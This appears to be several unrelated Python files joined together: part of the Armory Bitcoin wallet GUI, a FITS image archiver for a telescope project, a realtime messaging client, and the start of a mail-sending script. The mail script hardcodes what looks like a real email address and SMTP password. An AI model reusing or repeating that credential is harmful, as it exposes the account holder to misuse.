self.walletMap[wltID].checkWalletLockTimeout()
if self.doAutoBitcoind:
if TheTDM.isRunning(): # TODO Put this whole conditional block in a method
if tdmState=='Downloading':
self.updateSyncProgress()
downRate = TheTDM.getLastStats('downRate')
self.torrentCircBuffer.append(downRate if downRate else 0)
# Assumes 1 sec heartbeat
bufsz = len(self.torrentCircBuffer)
if bufsz > 5*MINUTE:
self.torrentCircBuffer = self.torrentCircBuffer[1:]
if bufsz >= 4.99*MINUTE:
# If dlrate is below 30 kB/s, offer the user a way to skip it
avgDownRate = sum(self.torrentCircBuffer) / float(bufsz)
if avgDownRate < 30*KILOBYTE:
if (RightNow() - self.lastAskedUserStopTorrent) > 5*MINUTE:
self.lastAskedUserStopTorrent = RightNow()
reply = QMessageBox.warning(self, tr('Torrent'), tr("""
Armory is attempting to use BitTorrent to speed up
the initial synchronization, but it appears to be
downloading slowly or not at all.
<br><br>
If the torrent engine is not starting properly,
or is not downloading
at a reasonable speed for your internet connection,
you should disable it in
<i>File\xe2\x86\x92Settings</i> and then
restart Armory."""), QMessageBox.Ok)
# For now, just show once then disable
self.lastAskedUserStopTorrent = UINT64_MAX
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin-Qt
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
blkRecvAgo = RightNow() - self.blkReceived
#blkStampAgo = RightNow() - TheBDM.blockchain().top().getTimestamp() # TODO - show absolute time, and show only on new block
self.lblArmoryStatus.setToolTip(tr('Last block received is %(time)s ago') % \
{ 'time' : secondsToHumanTime(blkRecvAgo) })
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = []
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = tr('"%(name)s"') % { 'name' : wlt.labelName }
else:
dispName = tr('"%(shortname)s..."') % { 'shortname' : wlt.labelName[:17] }
dispName = tr('Wallet %(n)s (%(id)s)') % { 'n' : dispName, 'id':wlt.uniqueIDB58}
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = '%(M)d-of-%(N)d "%(shortname)s"' % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = tr('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = tr('Lockbox %(name)s (%(id)s)') % { 'name' : dispName, 'id' : lbox.uniqueIDB58 }
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = tr('Bitcoins Received!')
dispLines.append(tr('Amount: %(total)s BTC') % { 'total' : totalStr })
dispLines.append(tr('Recipient: %(recp)s') % { 'recp' : dispName } )
elif ledgerAmt < 0:
# Sent!
title = tr('Bitcoins Sent!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('Sender: %(disp)s') % { 'disp' : dispName })
self.showTrayMsg(title, '\n'.join(dispLines), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in sequence that they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
# Marke it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
cppWlt = self.walletMap[moneyID].cppWallet
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = tr('Wallet "%(wname)s" (%(moneyID)s)') % { 'wname': wname, 'moneyID' : moneyID }
else:
cppWlt = self.cppLockboxWltMap[moneyID]
lbox = self.getLockboxByID(moneyID)
M = self.getLockboxByID(moneyID).M
N = self.getLockboxByID(moneyID).N
lname = self.getLockboxByID(moneyID).shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = tr('Lockbox %(M)d-of-%(N)d "%(lname)s" (%(id)s)') % { 'M' : M, 'N' : N, 'lname' : lname, 'id' : moneyID }
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(tr('Your bitcoins just did a lap!'), \
tr('%(wltName)s just sent some BTC to itself!') % { 'wltName' : wltName }, \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = []
totalStr = coin2strNZS(abs(le.getValue()))
if le.getValue() > 0:
title = tr('Bitcoins Received!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('From: %(wlt)s') % { 'wlt' : wltName })
elif le.getValue() < 0:
# Also display the address of where they went
txref = TheBDM.bdv().getTxByHash(le.getTxHash())
nOut = txref.getNumTxOut()
recipStr = ''
for i in range(nOut):
script = txref.getTxOutCopy(i).getScript()
if cppWlt.hasScrAddress(script_to_scrAddr(script)):
continue
if len(recipStr)==0:
recipStr = self.getDisplayStringForScript(script, 45)['String']
else:
recipStr = tr('<Multiple Recipients>')
title = tr('Bitcoins Sent!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('From: %(wlt)s') % { 'wlt' : wltName })
dispLines.append(tr('To: %(recp)s') % { 'recp' : recipStr })
self.showTrayMsg(title, '\n'.join(dispLines), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + '\n'.join(dispLines))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, tr('Minimize or Close'), \
tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=tr('Remember my answer'), \
yesStr=tr('Minimize'), noStr=tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
doClose = True;
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
#no callback notify in offline mode, just exit
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
self.actuallyDoExitNow(STOPPED_ACTION, 1)
return
self.shutdownBitcoindThread = threading.Thread(target=TheSDM.stopBitcoind)
self.shutdownBitcoindThread.start()
TheBDM.registerCppNotification(self.actuallyDoExitNow)
TheBDM.beginCleanShutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
# Don't want a strange error here interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
def actuallyDoExitNow(self, action, l):
# this is a BDM callback
if action != STOPPED_ACTION:
return
# Any extra shutdown activities, perhaps added by modules
for fn in self.extraShutdownFunctions:
try:
fn()
except:
LOGEXCEPT('Shutdown function failed. Skipping.')
# This will do nothing if bitcoind isn't running.
try:
self.shutdownBitcoindThread.join()
except:
pass
from twisted.internet import reactor
LOGINFO('Attempting to close the main window!')
reactor.stop()
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
dlgrdy = [0]
nerrors = 0
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
while not dlgrdy:
self.emit(SIGNAL('UWCS'), [1, tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = tr("""
The wallet analysis tool will become available
as soon as Armory is done loading. You can close this
window and it will reappear when ready.""")
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList:
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(tr("""
<b>The following dialogs need closed before you can
run the wallet analysis tool:</b>"""))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def cppNotifySignal(self, action, arg):
self.emit(SIGNAL('cppNotify'), action, arg)
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
if self.notifCtr == ArmoryMac.MacNotificationHandler.BuiltIn:
self.macNotifHdlr.showNotification(dispTitle, dispText)
elif (self.notifCtr == ArmoryMac.MacNotificationHandler.Growl12) or \
(self.notifCtr == ArmoryMac.MacNotificationHandler.Growl13):
self.macNotifHdlr.notifyGrowl(dispTitle, dispText, QIcon(self.iconfile))
#############################################################################
def method_signal(self, method):
method()
#############################################################################
def bdv(self):
return TheBDM.bdv()
############################################
def checkForAlreadyOpen():
import socket
LOGDEBUG('Checking for already open socket...')
try:
sock = socket.create_connection(('127.0.0.1',CLI_OPTIONS.interport), 0.1);
# If we got here (no error), there's already another Armory open
if OS_WINDOWS:
# Windows can be tricky, sometimes holds sockets even after closing
checkForAlreadyOpenError()
LOGERROR('Socket already in use. Sending CLI args to existing proc.')
if CLI_ARGS:
sock.send(CLI_ARGS[0])
sock.close()
LOGERROR('Exiting...')
os._exit(0)
except:
# This is actually the normal condition: we expect this to be the
# first/only instance of Armory and opening the socket will err out
pass
############################################
def checkForAlreadyOpenError():
LOGINFO('Already open error checking')
# Sometimes in Windows, Armory actually isn't open, because it holds
# onto the socket even after it's closed.
armoryExists = []
bitcoindExists = []
aexe = os.path.basename(sys.argv[0])
bexe = 'bitcoind.exe' if OS_WINDOWS else 'bitcoind'
for proc in psutil.process_iter():
if hasattr(proc, '_name'):
pname = str(proc._name)
elif hasattr(proc, 'name'):
pname = str(proc.name)
else:
raise 'psutil.process has no known name field!'
if aexe in pname:
LOGINFO('Found armory PID: %d', proc.pid)
armoryExists.append(proc.pid)
if bexe in pname:
LOGINFO('Found bitcoind PID: %d', proc.pid)
if ('testnet' in proc.name) == USE_TESTNET:
bitcoindExists.append(proc.pid)
if len(armoryExists)>0:
LOGINFO('Not an error! Armory really is open')
return
elif len(bitcoindExists)>0:
# Strange condition where bitcoind doesn't get killed by Armory/guardian
# (I've only seen this happen on windows, though)
LOGERROR('Found zombie bitcoind process...killing it')
for pid in bitcoindExists:
killProcess(pid)
time.sleep(0.5)
raise
############################################
if 1:
import qt4reactor
qt4reactor.install()
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
QAPP.setFont(GETFONT('var'))
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
from twisted.internet import reactor
def endProgram():
if reactor.threadpool is not None:
reactor.threadpool.stop()
QAPP.quit()
reactor.addSystemEventTrigger('before', 'shutdown', endProgram)
QAPP.setQuitOnLastWindowClosed(True)
reactor.runReturn()
os._exit(QAPP.exec_())
|
archiver.py
|
""" Code to facilitate delayed archiving of FITS files in the images directory """
import os
import time
import queue
import atexit
import shutil
from contextlib import suppress
from threading import Thread
from astropy import units as u
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time
from panoptes.pocs.base import PanBase
from huntsman.pocs.utils.logger import get_logger
VALID_EXTENSIONS = (".fits", ".fits.fz")
class Archiver(PanBase):
""" Class to watch the images directory for new files and move them to the archive directory
after enough time has passed.
"""
_valid_extensions = VALID_EXTENSIONS
def __init__(self, images_directory=None, archive_directory=None, delay_interval=None,
sleep_interval=None, status_interval=60, logger=None, *args, **kwargs):
"""
Args:
images_directory (str): The images directory to archive. If None (default), uses
the directories.images config entry.
archive_directory (str): The archive directory. If None (default), uses
the directories.archive config entry.
delay_interval (u.Quantity): The minimum amount of time a file must spend in the
archive queue before it is archived. If None (default), uses the
archiver.delay_time config entry.
sleep_interval (u.Quantity): The amout of time to sleep in between checking for new
files to archive. Ideally this should be longer than delay_interval. If None
(default), uses the archiver.sleep_interval confing entry.
status_interval (float, optional): Sleep for this long between status reports. Default
60s.
logger (logger, optional): The logger instance. If not provided, use default Huntsman
logger.
*args, **kwargs: Parsed to PanBase initialiser.
"""
if not logger:
logger = get_logger()
super().__init__(logger=logger, *args, **kwargs)
if images_directory is None:
images_directory = self.get_config("directories.images")
self.images_directory = str(images_directory)
if archive_directory is None:
archive_directory = self.get_config("directories.archive")
self.archive_directory = str(archive_directory)
self.logger.debug(f"Archive directory: {self.archive_directory}")
if delay_interval is None:
delay_interval = self.get_config("archiver.delay_interval")
self.delay_interval = get_quantity_value(delay_interval, u.minute) * u.minute
if sleep_interval is None:
sleep_interval = self.get_config("archiver.sleep_interval")
self.sleep_interval = get_quantity_value(sleep_interval, u.minute) * u.minute
self._status_interval = get_quantity_value(status_interval, u.second)
self._n_archived = 0
self._stop = False
self._archive_queue = queue.Queue()
self._status_thread = Thread(target=self._async_monitor_status)
self._watch_thread = Thread(target=self._async_watch_directory)
self._archive_thread = Thread(target=self._async_archive_files)
self._threads = [self._status_thread, self._watch_thread, self._archive_thread]
atexit.register(self.stop) # This gets called when python is quit
@property
def is_running(self):
return self.status["is_running"]
@property
def status(self):
""" Return a status dictionary.
Returns:
dict: The status dictionary.
"""
status = {"is_running": all([t.is_alive() for t in self._threads]),
"status_thread": self._status_thread.is_alive(),
"watch_thread": self._watch_thread.is_alive(),
"archive_thread": self._status_thread.is_alive(),
"queued": self._archive_queue.qsize(),
"archived": self._n_archived}
return status
def start(self):
""" Start archiving. """
self.logger.info("Starting archiving.")
self._stop = False
for thread in self._threads:
thread.start()
def stop(self, blocking=True):
""" Stop archiving.
Args:
blocking (bool, optional): If True (default), blocks until all threads have joined.
"""
self.logger.info("Stopping archiving.")
self._stop = True
if blocking:
for thread in self._threads:
with suppress(RuntimeError):
thread.join()
def _async_monitor_status(self):
""" Report the status on a regular interval. """
self.logger.debug("Starting status thread.")
while True:
if self._stop:
self.logger.debug("Stopping status thread.")
break
# Get the current status
status = self.status
self.logger.debug(f"Archiver status: {status}")
if not self.is_running:
self.logger.warning("Archiver is not running.")
# Sleep before reporting status again
time.sleep(self._status_interval)
def _async_watch_directory(self):
""" Watch the images directory and add all valid files to the archive queue. """
self.logger.debug("Starting watch thread.")
while True:
if self._stop:
self.logger.debug("Stopping watch thread.")
break
# Loop over filenames and add them to the queue
# Duplicates are taken care of later on
for filename in self._get_filenames_to_archive():
self._archive_queue.put([current_time(), filename])
# Sleep before checking again
time.sleep(self.sleep_interval.to_value(u.second))
def _async_archive_files(self, sleep=10):
""" Archive files that have been in the queue longer than self.delay_interval.
Args:
sleep (float, optional): Sleep for this long while waiting for self.delay_interval to
expire. Default: 10s.
"""
while True:
if self._stop and self._archive_queue.empty():
self.logger.debug("Stopping archive thread.")
break
# Get the oldest file from the queue
try:
track_time, filename = self._archive_queue.get(block=True, timeout=sleep)
except queue.Empty:
continue
# Archive file when it is old enough
while current_time() - track_time < self.delay_interval:
time.sleep(sleep)
with suppress(FileNotFoundError):
self._archive_file(filename)
self._n_archived += 1
# Tell the queue we are done with this file
self._archive_queue.task_done()
def _get_filenames_to_archive(self):
""" Get valid filenames in the images directory to archive.
Returns:
list: The list of filenames to archive.
"""
filenames = []
# Get all the matching filenames in the images directory
for path, _, files in os.walk(self.images_directory):
for name in files:
if any([name.endswith(ext) for ext in self._valid_extensions]):
filenames.append(os.path.join(path, name))
return filenames
def _get_archive_filename(self, filename):
""" Get the archive filename from the original filename.
Args:
filename (str): The filename string.
Returns:
str: The archived file name.
"""
relpath = os.path.relpath(filename, self.images_directory)
return os.path.join(self.archive_directory, relpath)
def _archive_file(self, filename):
""" Archive the file.
Args:
filename (str): The filename string.
"""
if not os.path.exists(filename): # May have already been archived or deleted
self.logger.debug(f"Tried to archive {filename} but it does not exist.")
raise FileNotFoundError
# Get the archived filename
archive_filename = self._get_archive_filename(filename)
# Make sure the archive directory exists
os.makedirs(os.path.dirname(archive_filename), exist_ok=True)
# Move the file to the archive directory
# NOTE: Use copy rather than move so the timestamp gets updated
# This is required for Nifi to pick up the file
self.logger.debug(f"Moving {filename} to {archive_filename}.")
shutil.copy(filename, archive_filename)
# Finally, delete the original
os.remove(filename)
|
ortc_extensibility.py
|
import httplib
import re
import random
import string
import time
import websocket
import json
import threading
REST_TIMEOUT = 5
class OrtcError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class Channel(object):
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def subscribe_on_reconnecting(self):
return self._subscribe_on_reconnecting
@subscribe_on_reconnecting.setter
def subscribe_on_reconnecting(self, subscribe_on_reconnecting):
self._subscribe_on_reconnecting = subscribe_on_reconnecting
@property
def is_subscribing(self):
return self._is_subscribing
@is_subscribing.setter
def is_subscribing(self, is_subscribing):
self._is_subscribing = is_subscribing
@property
def is_subscribed(self):
return self._is_subscribed
@is_subscribed.setter
def is_subscribed(self, is_subscribed):
self._is_subscribed = is_subscribed
@property
def callback(self):
return self._callback
@callback.setter
def callback(self, callback):
self._callback = callback
def __init__(self, name, subscribe_on_reconnecting, callback):
self._name = name
self._subscribe_on_reconnecting = subscribe_on_reconnecting
self._is_subscribing = False
self._is_subscribed = False
self._callback = callback
class MultiMessage(object):
@property
def total_parts(self):
return self._total_parts
@total_parts.setter
def total_parts(self, total_parts):
self._total_parts = total_parts
@property
def ready_parts(self):
return self._ready_parts
@ready_parts.setter
def ready_parts(self, ready_parts):
self._ready_parts = ready_parts
def __init__(self, total_parts):
self._total_parts = total_parts
self._ready_parts = 0
self._parts = [None]*total_parts
def set_part(self, part_id, part):
if self._parts[part_id] == None:
self._ready_parts += 1
self._parts[part_id] = part
def is_ready(self):
return True if self._ready_parts == self._total_parts else False
def get_all_message(self):
return ''.join([str(x) for x in self._parts])
class Private:
@staticmethod
def _get_cluster(host, app_key):
try:
host += '?appkey='+app_key
from urlparse import urlparse
uri = urlparse(host)
conn = httplib.HTTPConnection(uri.netloc, timeout=REST_TIMEOUT)
conn.request("GET", uri.path + "?" + uri.query)
res = conn.getresponse()
if res.status == 200:
rbody = re.search('"(.*)"', res.read()).group(0)
return rbody[1:][:-1]
except StandardError:
return None
@staticmethod
def _call_exception_callback(sender, exception):
if sender.on_exception_callback:
sender.on_exception_callback(sender, exception)
@staticmethod
def _validate_url(url):
return True if re.compile('^\s*(http|https):\/\/(\w+:{0,1}\w*@)?(\S+)(:[0-9]+)?(\/|\/([\w#!:.?+=&%@!\-\/]))?\s*$').match(url) else False
@staticmethod
def _validate_input(var):
return True if re.compile('^[\w\-:\/\.]*$').match(var) else False
@staticmethod
def _enum_state(**state):
return type('Enum state', (), state)
@staticmethod
def _remove_slashes(text):
text = text.replace("\\\\\\\"", '"')
text = text.replace("\\\\\\\\", '\\')
text = text.replace("\\\\n", '\n')
return text
@staticmethod
def _check_permission(permissions, channel):
if permissions == {}:
return True, ''
if channel in permissions:
return True, permissions[channel]
if ':' in channel:
if channel[:channel.index(':')]+':*' in permissions:
return True, permissions[channel[:channel.index(':')]+':*']
return False, ''
@staticmethod
def _rest_post_request(url, body, callback):
def p_thread():
try:
from urlparse import urlparse
uri = urlparse(url)
conn = httplib.HTTPSConnection(uri.netloc, timeout=REST_TIMEOUT)
headers = {}
headers['Content-Length'] = len(body)
conn.request("POST", uri.path, None, headers)
conn.send(body)
res = conn.getresponse()
if res.status==200:
callback(None, res.read())
else:
callback(str(res.status), None)
except Exception, e:
callback(str(e), None)
t = threading.Thread(target=p_thread)
t.setDaemon(True)
t.start()
@staticmethod
def _prepare_server(url, is_cluster, app_key, callback):
server = Private._get_cluster(url, app_key) if is_cluster else url
if server == None:
callback('Error getting server from Cluster', None)
return
server += '/' if not server[-1] == '/' else ''
return server
@staticmethod
def _prepare_server_internal(url, cluster_url, app_key, callback):
if app_key == None:
callback('Please, do connect first', None)
return False, None
server = Private._get_cluster(cluster_url, app_key) if not cluster_url == None else url
if server == None:
callback('Error getting server from Cluster', None)
return False, None
return True, server
|
test_mail.py
|
from multiprocessing import Process
from email.header import Header
from email.mime.text import MIMEText
import smtplib
class MailSender(object):
def __init__(self):
self.mail_server = 'smtp.qq.com'
self.mail_ssl_port = 465
self.mail_form_user = '996846239@qq.com'
self.mail_passwd = 'qxhonddalbdtbajb'
def _send(self, title, content, to_address):
msg = MIMEText(content)
msg['From'] = self.mail_form_user
msg['To'] = ','.join(to_address)
msg['Subject'] = Header(title, "utf-8").encode()
server = smtplib.SMTP_SSL(self.mail_server, self.mail_ssl_port)
